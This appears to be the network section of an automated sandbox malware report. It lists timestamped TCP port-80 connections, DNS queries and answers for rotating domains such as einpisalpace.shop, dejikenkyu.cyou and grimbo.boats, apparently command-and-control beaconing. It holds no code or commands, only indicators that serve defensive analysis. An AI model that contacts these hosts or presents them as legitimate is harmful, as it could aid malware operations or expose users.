                                                          Jan 10, 2025 23:06:17.986701965 CET4998380192.168.2.9209.74.79.40
                                                          Jan 10, 2025 23:06:17.991605043 CET8049983209.74.79.40192.168.2.9
                                                          Jan 10, 2025 23:06:37.263490915 CET4998480192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:37.268373013 CET8049984104.21.96.1192.168.2.9
                                                          Jan 10, 2025 23:06:37.268449068 CET4998480192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:37.283664942 CET4998480192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:37.289695978 CET8049984104.21.96.1192.168.2.9
                                                          Jan 10, 2025 23:06:38.221787930 CET8049984104.21.96.1192.168.2.9
                                                          Jan 10, 2025 23:06:38.221834898 CET8049984104.21.96.1192.168.2.9
                                                          Jan 10, 2025 23:06:38.221913099 CET4998480192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:38.222182989 CET8049984104.21.96.1192.168.2.9
                                                          Jan 10, 2025 23:06:38.222237110 CET4998480192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:38.790708065 CET4998480192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:39.809793949 CET4998580192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:39.814812899 CET8049985104.21.96.1192.168.2.9
                                                          Jan 10, 2025 23:06:39.814932108 CET4998580192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:39.830147982 CET4998580192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:39.835015059 CET8049985104.21.96.1192.168.2.9
                                                          Jan 10, 2025 23:06:40.733803034 CET8049985104.21.96.1192.168.2.9
                                                          Jan 10, 2025 23:06:40.733850956 CET8049985104.21.96.1192.168.2.9
                                                          Jan 10, 2025 23:06:40.733954906 CET4998580192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:40.735115051 CET8049985104.21.96.1192.168.2.9
                                                          Jan 10, 2025 23:06:40.735174894 CET4998580192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:41.337651014 CET4998580192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:42.402326107 CET4998680192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:42.407263041 CET8049986104.21.96.1192.168.2.9
                                                          Jan 10, 2025 23:06:42.407376051 CET4998680192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:42.422694921 CET4998680192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:42.427598000 CET8049986104.21.96.1192.168.2.9
                                                          Jan 10, 2025 23:06:42.427706003 CET8049986104.21.96.1192.168.2.9
                                                          Jan 10, 2025 23:06:43.329308987 CET8049986104.21.96.1192.168.2.9
                                                          Jan 10, 2025 23:06:43.329379082 CET8049986104.21.96.1192.168.2.9
                                                          Jan 10, 2025 23:06:43.329442024 CET4998680192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:43.329649925 CET8049986104.21.96.1192.168.2.9
                                                          Jan 10, 2025 23:06:43.329708099 CET4998680192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:43.931508064 CET4998680192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:44.950434923 CET4998780192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:44.955319881 CET8049987104.21.96.1192.168.2.9
                                                          Jan 10, 2025 23:06:44.958460093 CET4998780192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:44.967472076 CET4998780192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:44.972266912 CET8049987104.21.96.1192.168.2.9
                                                          Jan 10, 2025 23:06:45.893230915 CET8049987104.21.96.1192.168.2.9
                                                          Jan 10, 2025 23:06:45.893243074 CET8049987104.21.96.1192.168.2.9
                                                          Jan 10, 2025 23:06:45.893450022 CET4998780192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:45.893960953 CET8049987104.21.96.1192.168.2.9
                                                          Jan 10, 2025 23:06:45.894015074 CET4998780192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:45.896260023 CET4998780192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:45.901082039 CET8049987104.21.96.1192.168.2.9
                                                          Jan 10, 2025 23:06:59.027504921 CET4998880192.168.2.9144.76.229.203
                                                          Jan 10, 2025 23:06:59.032407999 CET8049988144.76.229.203192.168.2.9
                                                          Jan 10, 2025 23:06:59.032521009 CET4998880192.168.2.9144.76.229.203
                                                          Jan 10, 2025 23:06:59.047230959 CET4998880192.168.2.9144.76.229.203
                                                          Jan 10, 2025 23:06:59.052105904 CET8049988144.76.229.203192.168.2.9
                                                          Jan 10, 2025 23:06:59.671782970 CET8049988144.76.229.203192.168.2.9
                                                          Jan 10, 2025 23:06:59.671955109 CET8049988144.76.229.203192.168.2.9
                                                          Jan 10, 2025 23:06:59.672017097 CET4998880192.168.2.9144.76.229.203
                                                          Jan 10, 2025 23:07:00.556652069 CET4998880192.168.2.9144.76.229.203
                                                          Jan 10, 2025 23:07:01.575246096 CET4998980192.168.2.9144.76.229.203
                                                          Jan 10, 2025 23:07:01.580285072 CET8049989144.76.229.203192.168.2.9
                                                          Jan 10, 2025 23:07:01.580395937 CET4998980192.168.2.9144.76.229.203
                                                          Jan 10, 2025 23:07:01.594280005 CET4998980192.168.2.9144.76.229.203
                                                          Jan 10, 2025 23:07:01.599852085 CET8049989144.76.229.203192.168.2.9
                                                          Jan 10, 2025 23:07:02.216759920 CET8049989144.76.229.203192.168.2.9
                                                          Jan 10, 2025 23:07:02.216823101 CET8049989144.76.229.203192.168.2.9
                                                          Jan 10, 2025 23:07:02.216872931 CET4998980192.168.2.9144.76.229.203
                                                          Jan 10, 2025 23:07:03.103260994 CET4998980192.168.2.9144.76.229.203
                                                          Jan 10, 2025 23:07:04.122941971 CET4999080192.168.2.9144.76.229.203
                                                          Jan 10, 2025 23:07:04.128873110 CET8049990144.76.229.203192.168.2.9
                                                          Jan 10, 2025 23:07:04.128989935 CET4999080192.168.2.9144.76.229.203
                                                          Jan 10, 2025 23:07:04.148729086 CET4999080192.168.2.9144.76.229.203
                                                          Jan 10, 2025 23:07:04.154047966 CET8049990144.76.229.203192.168.2.9
                                                          Jan 10, 2025 23:07:04.154062033 CET8049990144.76.229.203192.168.2.9
                                                          Jan 10, 2025 23:07:04.806638956 CET8049990144.76.229.203192.168.2.9
                                                          Jan 10, 2025 23:07:04.806699991 CET8049990144.76.229.203192.168.2.9
                                                          Jan 10, 2025 23:07:04.806807041 CET4999080192.168.2.9144.76.229.203
                                                          Jan 10, 2025 23:07:05.650254011 CET4999080192.168.2.9144.76.229.203
                                                          Jan 10, 2025 23:07:06.669198990 CET4999180192.168.2.9144.76.229.203
                                                          Jan 10, 2025 23:07:06.674174070 CET8049991144.76.229.203192.168.2.9
                                                          Jan 10, 2025 23:07:06.674278021 CET4999180192.168.2.9144.76.229.203
                                                          Jan 10, 2025 23:07:06.686569929 CET4999180192.168.2.9144.76.229.203
                                                          Jan 10, 2025 23:07:06.691390991 CET8049991144.76.229.203192.168.2.9
                                                          Jan 10, 2025 23:07:07.337327957 CET8049991144.76.229.203192.168.2.9
                                                          Jan 10, 2025 23:07:07.337367058 CET8049991144.76.229.203192.168.2.9
                                                          Jan 10, 2025 23:07:07.337600946 CET4999180192.168.2.9144.76.229.203
                                                          Jan 10, 2025 23:07:07.341351032 CET4999180192.168.2.9144.76.229.203
                                                          Jan 10, 2025 23:07:07.346198082 CET8049991144.76.229.203192.168.2.9
                                                          Jan 10, 2025 23:07:12.377279997 CET4999280192.168.2.9172.67.182.198
                                                          Jan 10, 2025 23:07:12.382080078 CET8049992172.67.182.198192.168.2.9
                                                          Jan 10, 2025 23:07:12.382185936 CET4999280192.168.2.9172.67.182.198
                                                          Jan 10, 2025 23:07:12.404422045 CET4999280192.168.2.9172.67.182.198
                                                          Jan 10, 2025 23:07:12.409274101 CET8049992172.67.182.198192.168.2.9
                                                          Jan 10, 2025 23:07:13.061772108 CET8049992172.67.182.198192.168.2.9
                                                          Jan 10, 2025 23:07:13.062249899 CET8049992172.67.182.198192.168.2.9
                                                          Jan 10, 2025 23:07:13.062340021 CET4999280192.168.2.9172.67.182.198
                                                          Jan 10, 2025 23:07:13.915842056 CET4999280192.168.2.9172.67.182.198
                                                          Jan 10, 2025 23:07:14.934855938 CET4999380192.168.2.9172.67.182.198
                                                          Jan 10, 2025 23:07:14.941879988 CET8049993172.67.182.198192.168.2.9
                                                          Jan 10, 2025 23:07:14.942014933 CET4999380192.168.2.9172.67.182.198
                                                          Jan 10, 2025 23:07:14.958389044 CET4999380192.168.2.9172.67.182.198
                                                          Jan 10, 2025 23:07:14.963418007 CET8049993172.67.182.198192.168.2.9
                                                          Jan 10, 2025 23:07:15.602125883 CET8049993172.67.182.198192.168.2.9
                                                          Jan 10, 2025 23:07:15.602598906 CET8049993172.67.182.198192.168.2.9
                                                          Jan 10, 2025 23:07:15.602638960 CET8049993172.67.182.198192.168.2.9
                                                          Jan 10, 2025 23:07:15.602705956 CET4999380192.168.2.9172.67.182.198
                                                          Jan 10, 2025 23:07:15.602747917 CET4999380192.168.2.9172.67.182.198
                                                          Jan 10, 2025 23:07:16.462795019 CET4999380192.168.2.9172.67.182.198
                                                          Jan 10, 2025 23:07:17.487054110 CET4999480192.168.2.9172.67.182.198
                                                          Jan 10, 2025 23:07:17.491889954 CET8049994172.67.182.198192.168.2.9
                                                          Jan 10, 2025 23:07:17.491952896 CET4999480192.168.2.9172.67.182.198
                                                          Jan 10, 2025 23:07:17.512401104 CET4999480192.168.2.9172.67.182.198
                                                          Jan 10, 2025 23:07:17.517272949 CET8049994172.67.182.198192.168.2.9
                                                          Jan 10, 2025 23:07:17.517369986 CET8049994172.67.182.198192.168.2.9
                                                          Jan 10, 2025 23:07:18.140299082 CET8049994172.67.182.198192.168.2.9
                                                          Jan 10, 2025 23:07:18.142226934 CET8049994172.67.182.198192.168.2.9
                                                          Jan 10, 2025 23:07:18.142286062 CET4999480192.168.2.9172.67.182.198
                                                          Jan 10, 2025 23:07:19.025291920 CET4999480192.168.2.9172.67.182.198
                                                          Jan 10, 2025 23:07:20.044317007 CET4999580192.168.2.9172.67.182.198
                                                          Jan 10, 2025 23:07:20.049283981 CET8049995172.67.182.198192.168.2.9
                                                          Jan 10, 2025 23:07:20.049467087 CET4999580192.168.2.9172.67.182.198
                                                          Jan 10, 2025 23:07:20.059042931 CET4999580192.168.2.9172.67.182.198
                                                          Jan 10, 2025 23:07:20.063905001 CET8049995172.67.182.198192.168.2.9
                                                          Jan 10, 2025 23:07:20.696115971 CET8049995172.67.182.198192.168.2.9
                                                          Jan 10, 2025 23:07:20.696747065 CET8049995172.67.182.198192.168.2.9
                                                          Jan 10, 2025 23:07:20.696839094 CET4999580192.168.2.9172.67.182.198
                                                          Jan 10, 2025 23:07:20.699310064 CET4999580192.168.2.9172.67.182.198
                                                          Jan 10, 2025 23:07:20.704118967 CET8049995172.67.182.198192.168.2.9
                                                          Jan 10, 2025 23:07:25.745637894 CET4999680192.168.2.913.248.169.48
                                                          Jan 10, 2025 23:07:25.750557899 CET804999613.248.169.48192.168.2.9
                                                          Jan 10, 2025 23:07:25.750664949 CET4999680192.168.2.913.248.169.48
                                                          Jan 10, 2025 23:07:25.765160084 CET4999680192.168.2.913.248.169.48
                                                          Jan 10, 2025 23:07:25.770015955 CET804999613.248.169.48192.168.2.9
                                                          Jan 10, 2025 23:07:26.218266010 CET804999613.248.169.48192.168.2.9
                                                          Jan 10, 2025 23:07:26.218293905 CET804999613.248.169.48192.168.2.9
                                                          Jan 10, 2025 23:07:26.218381882 CET4999680192.168.2.913.248.169.48
                                                          Jan 10, 2025 23:07:27.275271893 CET4999680192.168.2.913.248.169.48
                                                          Jan 10, 2025 23:07:28.294547081 CET4999780192.168.2.913.248.169.48
                                                          Jan 10, 2025 23:07:28.299531937 CET804999713.248.169.48192.168.2.9
                                                          Jan 10, 2025 23:07:28.299602985 CET4999780192.168.2.913.248.169.48
                                                          Jan 10, 2025 23:07:28.314491987 CET4999780192.168.2.913.248.169.48
                                                          Jan 10, 2025 23:07:28.319638968 CET804999713.248.169.48192.168.2.9
                                                          Jan 10, 2025 23:07:28.758781910 CET804999713.248.169.48192.168.2.9
                                                          Jan 10, 2025 23:07:28.758846998 CET804999713.248.169.48192.168.2.9
                                                          Jan 10, 2025 23:07:28.758948088 CET4999780192.168.2.913.248.169.48
                                                          Jan 10, 2025 23:07:29.822177887 CET4999780192.168.2.913.248.169.48
                                                          Jan 10, 2025 23:07:30.841378927 CET4999880192.168.2.913.248.169.48
                                                          Jan 10, 2025 23:07:30.846502066 CET804999813.248.169.48192.168.2.9
                                                          Jan 10, 2025 23:07:30.846605062 CET4999880192.168.2.913.248.169.48
                                                          Jan 10, 2025 23:07:30.861717939 CET4999880192.168.2.913.248.169.48
                                                          Jan 10, 2025 23:07:30.866642952 CET804999813.248.169.48192.168.2.9
                                                          Jan 10, 2025 23:07:30.866700888 CET804999813.248.169.48192.168.2.9
                                                          Jan 10, 2025 23:07:31.325613022 CET804999813.248.169.48192.168.2.9
                                                          Jan 10, 2025 23:07:31.325678110 CET804999813.248.169.48192.168.2.9
                                                          Jan 10, 2025 23:07:31.325757027 CET4999880192.168.2.913.248.169.48
                                                          Jan 10, 2025 23:07:32.369143009 CET4999880192.168.2.913.248.169.48
                                                          Jan 10, 2025 23:07:33.388021946 CET4999980192.168.2.913.248.169.48
                                                          Jan 10, 2025 23:07:33.393290043 CET804999913.248.169.48192.168.2.9
                                                          Jan 10, 2025 23:07:33.393393993 CET4999980192.168.2.913.248.169.48
                                                          Jan 10, 2025 23:07:33.403079987 CET4999980192.168.2.913.248.169.48
                                                          Jan 10, 2025 23:07:33.408082962 CET804999913.248.169.48192.168.2.9
                                                          Jan 10, 2025 23:07:33.879479885 CET804999913.248.169.48192.168.2.9
                                                          Jan 10, 2025 23:07:33.879544020 CET804999913.248.169.48192.168.2.9
                                                          Jan 10, 2025 23:07:33.879744053 CET4999980192.168.2.913.248.169.48
                                                          Jan 10, 2025 23:07:33.882651091 CET4999980192.168.2.913.248.169.48
                                                          Jan 10, 2025 23:07:33.887511969 CET804999913.248.169.48192.168.2.9
                                                          Jan 10, 2025 23:07:39.379218102 CET5000080192.168.2.9160.25.166.123
                                                          Jan 10, 2025 23:07:39.384020090 CET8050000160.25.166.123192.168.2.9
                                                          Jan 10, 2025 23:07:39.384088993 CET5000080192.168.2.9160.25.166.123
                                                          Jan 10, 2025 23:07:39.399435043 CET5000080192.168.2.9160.25.166.123
                                                          Jan 10, 2025 23:07:39.404190063 CET8050000160.25.166.123192.168.2.9
                                                          Jan 10, 2025 23:07:40.376097918 CET8050000160.25.166.123192.168.2.9
                                                          Jan 10, 2025 23:07:40.376245975 CET8050000160.25.166.123192.168.2.9
                                                          Jan 10, 2025 23:07:40.376353025 CET5000080192.168.2.9160.25.166.123
                                                          Jan 10, 2025 23:07:40.376418114 CET8050000160.25.166.123192.168.2.9
                                                          Jan 10, 2025 23:07:40.376498938 CET5000080192.168.2.9160.25.166.123
                                                          Jan 10, 2025 23:07:40.916052103 CET5000080192.168.2.9160.25.166.123
                                                          Jan 10, 2025 23:07:41.934938908 CET5000180192.168.2.9160.25.166.123
                                                          Jan 10, 2025 23:07:41.939841032 CET8050001160.25.166.123192.168.2.9
                                                          Jan 10, 2025 23:07:41.939965010 CET5000180192.168.2.9160.25.166.123
                                                          Jan 10, 2025 23:07:41.951749086 CET5000180192.168.2.9160.25.166.123
                                                          Jan 10, 2025 23:07:41.956578016 CET8050001160.25.166.123192.168.2.9
                                                          Jan 10, 2025 23:07:42.946168900 CET8050001160.25.166.123192.168.2.9
                                                          Jan 10, 2025 23:07:42.946202993 CET8050001160.25.166.123192.168.2.9
                                                          Jan 10, 2025 23:07:42.946218967 CET8050001160.25.166.123192.168.2.9
                                                          Jan 10, 2025 23:07:42.946311951 CET5000180192.168.2.9160.25.166.123
                                                          Jan 10, 2025 23:07:42.946346998 CET5000180192.168.2.9160.25.166.123
                                                          Jan 10, 2025 23:07:43.462953091 CET5000180192.168.2.9160.25.166.123
                                                          Jan 10, 2025 23:07:44.484837055 CET5000280192.168.2.9160.25.166.123
                                                          Jan 10, 2025 23:07:44.489902020 CET8050002160.25.166.123192.168.2.9
                                                          Jan 10, 2025 23:07:44.489984035 CET5000280192.168.2.9160.25.166.123
                                                          Jan 10, 2025 23:07:44.510704994 CET5000280192.168.2.9160.25.166.123
                                                          Jan 10, 2025 23:07:44.515556097 CET8050002160.25.166.123192.168.2.9
                                                          Jan 10, 2025 23:07:44.515695095 CET8050002160.25.166.123192.168.2.9
                                                          Jan 10, 2025 23:07:45.439198017 CET8050002160.25.166.123192.168.2.9
                                                          Jan 10, 2025 23:07:45.439220905 CET8050002160.25.166.123192.168.2.9
                                                          Jan 10, 2025 23:07:45.439240932 CET8050002160.25.166.123192.168.2.9
                                                          Jan 10, 2025 23:07:45.439321995 CET5000280192.168.2.9160.25.166.123
                                                          Jan 10, 2025 23:07:45.439351082 CET5000280192.168.2.9160.25.166.123
                                                          Jan 10, 2025 23:07:46.025307894 CET5000280192.168.2.9160.25.166.123
                                                          Jan 10, 2025 23:07:47.044563055 CET5000380192.168.2.9160.25.166.123
                                                          Jan 10, 2025 23:07:47.049529076 CET8050003160.25.166.123192.168.2.9
                                                          Jan 10, 2025 23:07:47.049614906 CET5000380192.168.2.9160.25.166.123
                                                          Jan 10, 2025 23:07:47.061144114 CET5000380192.168.2.9160.25.166.123
                                                          Jan 10, 2025 23:07:47.065968990 CET8050003160.25.166.123192.168.2.9
                                                          Jan 10, 2025 23:07:48.025239944 CET8050003160.25.166.123192.168.2.9
                                                          Jan 10, 2025 23:07:48.025269985 CET8050003160.25.166.123192.168.2.9
                                                          Jan 10, 2025 23:07:48.025285006 CET8050003160.25.166.123192.168.2.9
                                                          Jan 10, 2025 23:07:48.025418043 CET5000380192.168.2.9160.25.166.123
                                                          Jan 10, 2025 23:07:48.028240919 CET5000380192.168.2.9160.25.166.123
                                                          Jan 10, 2025 23:07:48.033061981 CET8050003160.25.166.123192.168.2.9
                                                          Jan 10, 2025 23:07:53.090796947 CET5000480192.168.2.968.66.226.119
                                                          Jan 10, 2025 23:07:53.095674038 CET805000468.66.226.119192.168.2.9
                                                          Jan 10, 2025 23:07:53.095757008 CET5000480192.168.2.968.66.226.119
                                                          Jan 10, 2025 23:07:53.111351967 CET5000480192.168.2.968.66.226.119
                                                          Jan 10, 2025 23:07:53.116202116 CET805000468.66.226.119192.168.2.9
                                                          Jan 10, 2025 23:07:53.660692930 CET805000468.66.226.119192.168.2.9
                                                          Jan 10, 2025 23:07:53.660974979 CET805000468.66.226.119192.168.2.9
                                                          Jan 10, 2025 23:07:53.661161900 CET5000480192.168.2.968.66.226.119
                                                          Jan 10, 2025 23:07:54.619148016 CET5000480192.168.2.968.66.226.119
                                                          Jan 10, 2025 23:07:55.638147116 CET5000580192.168.2.968.66.226.119
                                                          Jan 10, 2025 23:07:55.643109083 CET805000568.66.226.119192.168.2.9
                                                          Jan 10, 2025 23:07:55.643238068 CET5000580192.168.2.968.66.226.119
                                                          Jan 10, 2025 23:07:55.658931017 CET5000580192.168.2.968.66.226.119
                                                          Jan 10, 2025 23:07:55.663832903 CET805000568.66.226.119192.168.2.9
                                                          Jan 10, 2025 23:07:56.232325077 CET805000568.66.226.119192.168.2.9
                                                          Jan 10, 2025 23:07:56.232650995 CET805000568.66.226.119192.168.2.9
                                                          Jan 10, 2025 23:07:56.232724905 CET5000580192.168.2.968.66.226.119
                                                          Jan 10, 2025 23:07:57.166341066 CET5000580192.168.2.968.66.226.119
                                                          Jan 10, 2025 23:07:58.654001951 CET5000680192.168.2.968.66.226.119
                                                          Jan 10, 2025 23:07:58.659023046 CET805000668.66.226.119192.168.2.9
                                                          Jan 10, 2025 23:07:58.659101009 CET5000680192.168.2.968.66.226.119
                                                          Jan 10, 2025 23:07:58.674493074 CET5000680192.168.2.968.66.226.119
                                                          Jan 10, 2025 23:07:58.679457903 CET805000668.66.226.119192.168.2.9
                                                          Jan 10, 2025 23:07:58.679511070 CET805000668.66.226.119192.168.2.9
                                                          Jan 10, 2025 23:07:59.239759922 CET805000668.66.226.119192.168.2.9
                                                          Jan 10, 2025 23:07:59.240168095 CET805000668.66.226.119192.168.2.9
                                                          Jan 10, 2025 23:07:59.240227938 CET5000680192.168.2.968.66.226.119

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jan 10, 2025 23:05:39.339754105 CET5701053192.168.2.91.1.1.1
                                                          Jan 10, 2025 23:05:39.352343082 CET53570101.1.1.1192.168.2.9
                                                          Jan 10, 2025 23:05:55.753168106 CET5501953192.168.2.91.1.1.1
                                                          Jan 10, 2025 23:05:55.972634077 CET53550191.1.1.1192.168.2.9
                                                          Jan 10, 2025 23:06:09.700700045 CET5646353192.168.2.91.1.1.1
                                                          Jan 10, 2025 23:06:09.711669922 CET53564631.1.1.1192.168.2.9
                                                          Jan 10, 2025 23:06:22.997678995 CET5758453192.168.2.91.1.1.1
                                                          Jan 10, 2025 23:06:24.009547949 CET5758453192.168.2.91.1.1.1
                                                          Jan 10, 2025 23:06:25.025161982 CET5758453192.168.2.91.1.1.1
                                                          Jan 10, 2025 23:06:26.092196941 CET53575841.1.1.1192.168.2.9
                                                          Jan 10, 2025 23:06:26.092211008 CET53575841.1.1.1192.168.2.9
                                                          Jan 10, 2025 23:06:26.092221022 CET53575841.1.1.1192.168.2.9
                                                          Jan 10, 2025 23:06:28.132672071 CET5686853192.168.2.91.1.1.1
                                                          Jan 10, 2025 23:06:29.118953943 CET5686853192.168.2.91.1.1.1
                                                          Jan 10, 2025 23:06:30.118838072 CET5686853192.168.2.91.1.1.1
                                                          Jan 10, 2025 23:06:31.216470003 CET53568681.1.1.1192.168.2.9
                                                          Jan 10, 2025 23:06:31.216490984 CET53568681.1.1.1192.168.2.9
                                                          Jan 10, 2025 23:06:31.216567993 CET53568681.1.1.1192.168.2.9
                                                          Jan 10, 2025 23:06:37.248590946 CET5958153192.168.2.91.1.1.1
                                                          Jan 10, 2025 23:06:37.261061907 CET53595811.1.1.1192.168.2.9
                                                          Jan 10, 2025 23:06:50.903901100 CET6476153192.168.2.91.1.1.1
                                                          Jan 10, 2025 23:06:50.912728071 CET53647611.1.1.1192.168.2.9
                                                          Jan 10, 2025 23:06:58.966353893 CET6405053192.168.2.91.1.1.1
                                                          Jan 10, 2025 23:06:59.024689913 CET53640501.1.1.1192.168.2.9
                                                          Jan 10, 2025 23:07:12.359844923 CET5345453192.168.2.91.1.1.1
                                                          Jan 10, 2025 23:07:12.374167919 CET53534541.1.1.1192.168.2.9
                                                          Jan 10, 2025 23:07:25.717946053 CET5642153192.168.2.91.1.1.1
                                                          Jan 10, 2025 23:07:25.742908955 CET53564211.1.1.1192.168.2.9
                                                          Jan 10, 2025 23:07:38.888984919 CET5017953192.168.2.91.1.1.1
                                                          Jan 10, 2025 23:07:39.376694918 CET53501791.1.1.1192.168.2.9
                                                          Jan 10, 2025 23:07:53.044135094 CET5105453192.168.2.91.1.1.1
                                                          Jan 10, 2025 23:07:53.088196993 CET53510541.1.1.1192.168.2.9

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Jan 10, 2025 23:05:39.339754105 CET192.168.2.91.1.1.10xf00fStandard query (0)www.einpisalpace.shopA (IP address)IN (0x0001)false
                                                          Jan 10, 2025 23:05:55.753168106 CET192.168.2.91.1.1.10xd1cStandard query (0)www.deacapalla.onlineA (IP address)IN (0x0001)false
                                                          Jan 10, 2025 23:06:09.700700045 CET192.168.2.91.1.1.10x2e13Standard query (0)www.unlimitu.websiteA (IP address)IN (0x0001)false
                                                          Jan 10, 2025 23:06:22.997678995 CET192.168.2.91.1.1.10x548aStandard query (0)www.366800008.xyzA (IP address)IN (0x0001)false
                                                          Jan 10, 2025 23:06:24.009547949 CET192.168.2.91.1.1.10x548aStandard query (0)www.366800008.xyzA (IP address)IN (0x0001)false
                                                          Jan 10, 2025 23:06:25.025161982 CET192.168.2.91.1.1.10x548aStandard query (0)www.366800008.xyzA (IP address)IN (0x0001)false
                                                          Jan 10, 2025 23:06:28.132672071 CET192.168.2.91.1.1.10x7dcStandard query (0)www.366800008.xyzA (IP address)IN (0x0001)false
                                                          Jan 10, 2025 23:06:29.118953943 CET192.168.2.91.1.1.10x7dcStandard query (0)www.366800008.xyzA (IP address)IN (0x0001)false
                                                          Jan 10, 2025 23:06:30.118838072 CET192.168.2.91.1.1.10x7dcStandard query (0)www.366800008.xyzA (IP address)IN (0x0001)false
                                                          Jan 10, 2025 23:06:37.248590946 CET192.168.2.91.1.1.10x87b0Standard query (0)www.dejikenkyu.cyouA (IP address)IN (0x0001)false
                                                          Jan 10, 2025 23:06:50.903901100 CET192.168.2.91.1.1.10x2b3eStandard query (0)www.nhengtai.netA (IP address)IN (0x0001)false
                                                          Jan 10, 2025 23:06:58.966353893 CET192.168.2.91.1.1.10x2e8fStandard query (0)www.031233226.xyzA (IP address)IN (0x0001)false
                                                          Jan 10, 2025 23:07:12.359844923 CET192.168.2.91.1.1.10x3dc5Standard query (0)www.grimbo.boatsA (IP address)IN (0x0001)false
                                                          Jan 10, 2025 23:07:25.717946053 CET192.168.2.91.1.1.10xdfd0Standard query (0)www.autonomousoid.proA (IP address)IN (0x0001)false
                                                          Jan 10, 2025 23:07:38.888984919 CET192.168.2.91.1.1.10x5f58Standard query (0)www.rpa.asiaA (IP address)IN (0x0001)false
                                                          Jan 10, 2025 23:07:53.044135094 CET192.168.2.91.1.1.10xc101Standard query (0)www.pitaloka.xyzA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Jan 10, 2025 23:05:39.352343082 CET1.1.1.1192.168.2.90xf00fNo error (0)www.einpisalpace.shop188.114.97.3A (IP address)IN (0x0001)false
                                                          Jan 10, 2025 23:05:39.352343082 CET1.1.1.1192.168.2.90xf00fNo error (0)www.einpisalpace.shop188.114.96.3A (IP address)IN (0x0001)false
                                                          Jan 10, 2025 23:05:55.972634077 CET1.1.1.1192.168.2.90xd1cNo error (0)www.deacapalla.online208.91.197.27A (IP address)IN (0x0001)false
                                                          Jan 10, 2025 23:06:09.711669922 CET1.1.1.1192.168.2.90x2e13No error (0)www.unlimitu.website209.74.79.40A (IP address)IN (0x0001)false
                                                          Jan 10, 2025 23:06:26.092196941 CET1.1.1.1192.168.2.90x548aServer failure (2)www.366800008.xyznonenoneA (IP address)IN (0x0001)false
                                                          Jan 10, 2025 23:06:26.092211008 CET1.1.1.1192.168.2.90x548aServer failure (2)www.366800008.xyznonenoneA (IP address)IN (0x0001)false
                                                          Jan 10, 2025 23:06:26.092221022 CET1.1.1.1192.168.2.90x548aServer failure (2)www.366800008.xyznonenoneA (IP address)IN (0x0001)false
                                                          Jan 10, 2025 23:06:31.216470003 CET1.1.1.1192.168.2.90x7dcServer failure (2)www.366800008.xyznonenoneA (IP address)IN (0x0001)false
                                                          Jan 10, 2025 23:06:31.216490984 CET1.1.1.1192.168.2.90x7dcServer failure (2)www.366800008.xyznonenoneA (IP address)IN (0x0001)false
                                                          Jan 10, 2025 23:06:31.216567993 CET1.1.1.1192.168.2.90x7dcServer failure (2)www.366800008.xyznonenoneA (IP address)IN (0x0001)false
                                                          Jan 10, 2025 23:06:37.261061907 CET1.1.1.1192.168.2.90x87b0No error (0)www.dejikenkyu.cyou104.21.96.1A (IP address)IN (0x0001)false
                                                          Jan 10, 2025 23:06:37.261061907 CET1.1.1.1192.168.2.90x87b0No error (0)www.dejikenkyu.cyou104.21.64.1A (IP address)IN (0x0001)false
                                                          Jan 10, 2025 23:06:37.261061907 CET1.1.1.1192.168.2.90x87b0No error (0)www.dejikenkyu.cyou104.21.112.1A (IP address)IN (0x0001)false
                                                          Jan 10, 2025 23:06:37.261061907 CET1.1.1.1192.168.2.90x87b0No error (0)www.dejikenkyu.cyou104.21.48.1A (IP address)IN (0x0001)false
                                                          Jan 10, 2025 23:06:37.261061907 CET1.1.1.1192.168.2.90x87b0No error (0)www.dejikenkyu.cyou104.21.16.1A (IP address)IN (0x0001)false
                                                          Jan 10, 2025 23:06:37.261061907 CET1.1.1.1192.168.2.90x87b0No error (0)www.dejikenkyu.cyou104.21.80.1A (IP address)IN (0x0001)false
                                                          Jan 10, 2025 23:06:37.261061907 CET1.1.1.1192.168.2.90x87b0No error (0)www.dejikenkyu.cyou104.21.32.1A (IP address)IN (0x0001)false
                                                          Jan 10, 2025 23:06:50.912728071 CET1.1.1.1192.168.2.90x2b3eName error (3)www.nhengtai.netnonenoneA (IP address)IN (0x0001)false
                                                          Jan 10, 2025 23:06:59.024689913 CET1.1.1.1192.168.2.90x2e8fNo error (0)www.031233226.xyz031233226.xyzCNAME (Canonical name)IN (0x0001)false
                                                          Jan 10, 2025 23:06:59.024689913 CET1.1.1.1192.168.2.90x2e8fNo error (0)031233226.xyz144.76.229.203A (IP address)IN (0x0001)false
                                                          Jan 10, 2025 23:07:12.374167919 CET1.1.1.1192.168.2.90x3dc5No error (0)www.grimbo.boats172.67.182.198A (IP address)IN (0x0001)false
                                                          Jan 10, 2025 23:07:12.374167919 CET1.1.1.1192.168.2.90x3dc5No error (0)www.grimbo.boats104.21.18.171A (IP address)IN (0x0001)false
                                                          Jan 10, 2025 23:07:25.742908955 CET1.1.1.1192.168.2.90xdfd0No error (0)www.autonomousoid.pro13.248.169.48A (IP address)IN (0x0001)false
